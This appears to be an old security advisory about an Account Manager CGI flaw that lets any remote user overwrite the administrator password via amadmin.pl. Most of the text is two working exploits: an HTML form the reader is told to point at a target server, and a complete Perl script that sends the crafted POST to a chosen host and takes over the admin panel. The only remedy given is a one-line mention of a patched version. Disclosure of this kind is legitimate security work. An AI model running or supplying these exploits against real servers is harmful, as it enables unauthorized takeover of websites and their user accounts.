COMMAND

    Account Manager CGI

SYSTEMS AFFECTED

    ALL including LITE and PRO haven't been able to test ENTERPRISE

PROBLEM

    'n30' found following.  The  Script allows any remote user  access
    to the Administration Control Panel through overwriting the  Admin
    Password with  one of  their own  making.   This is possible since
    the  script  parses  the  inputted  data  with total disregard for
    whether the current userhas Admin priveleges.  Therefore calling

        www.server.com/cgibin/amadmin.pl?setpasswd

    using a POST command would allow the password to be altered.

    Using this exploit would give a remote user access to add and
    remove users from protected areas of your website perphaps to
    other more interesting CGI's.

    Here comes the exploit:

    <FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST"><CENTER><BR>
    <TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
    COLSTART="1"><P><B><FONT FACE="verdana, arial, helvetica"><FONT
    COLOR="#FF0000">Account Manager LITE/PRO</FONT>:  Password Exploit!</FONT></B></P>
    <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></B></P></CENTER>
    <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice.  Once to set it, and once to confirm it.</FONT></P>
    <CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS><TR
    ><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD
    COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR>
    <TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD
    COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR>
    <TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT
    TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD><TD COLSTART="2"><BR></TD></TR></ROWS></TBODY></TABLE></CENTER><CENTER><TABLE
    BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
    COLSTART="1"><HR SIZE="1"></TD></TR><TR><TD ALIGN="CENTER" COLSTART="1"><FONT
    SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Passwerd Exploit
    </B></A></FONT></TD></TR></ROWS></TBODY></TABLE></CENTER></TD></TR></ROWS></TBODY></TABLE></CENTER>
    <CENTER><FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to amadmin.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER>
    </FORM>
    
    <!-- Shoutz to trib, axess and all who know me! -->

    Here is another:

    #!/usr/bin/perl -w
    
    ## Account Manager LITE 1.0x / cgi.elitehost.com
    ## This exploit let's you change the administrator
    ## password, and completely take controll.
    ##
    ## teleh0r@doglover.com / anno 2000
    ## httpd://teleh0r.cjb.net
    
    use strict;
    use Socket;
    
    if (@ARGV < 2) {
        print("Usage: $0 <target> <newpass>\n");
        exit(1);
    }
    
    my($target,$newpass,$crypt,$length,$command,
       $agent,$sploit,$iaddr,$paddr,$proto);
    
    ($target,$newpass) = @ARGV;
    
    $crypt = crypt($newpass, 'aa');
    $length = 34 + length($newpass);
    
    print("\nRemote host: $target\n");
    print("CGI-script: /cgi-bin/subscribe.pl\n");
    print("New password: $newpass / $crypt\n\n");
    
    $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
    $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
    
    # Note that POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
    # may have to be changed...
    
    $sploit=
    "POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $command";
    
    $iaddr = inet_aton($target)                     || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    sleep(2);
    print("Surf to http://$target/cgi-bin/amlite/amadmin.pl\n");
    exit(0);

SOLUTION

    Already available see website, download version is patched.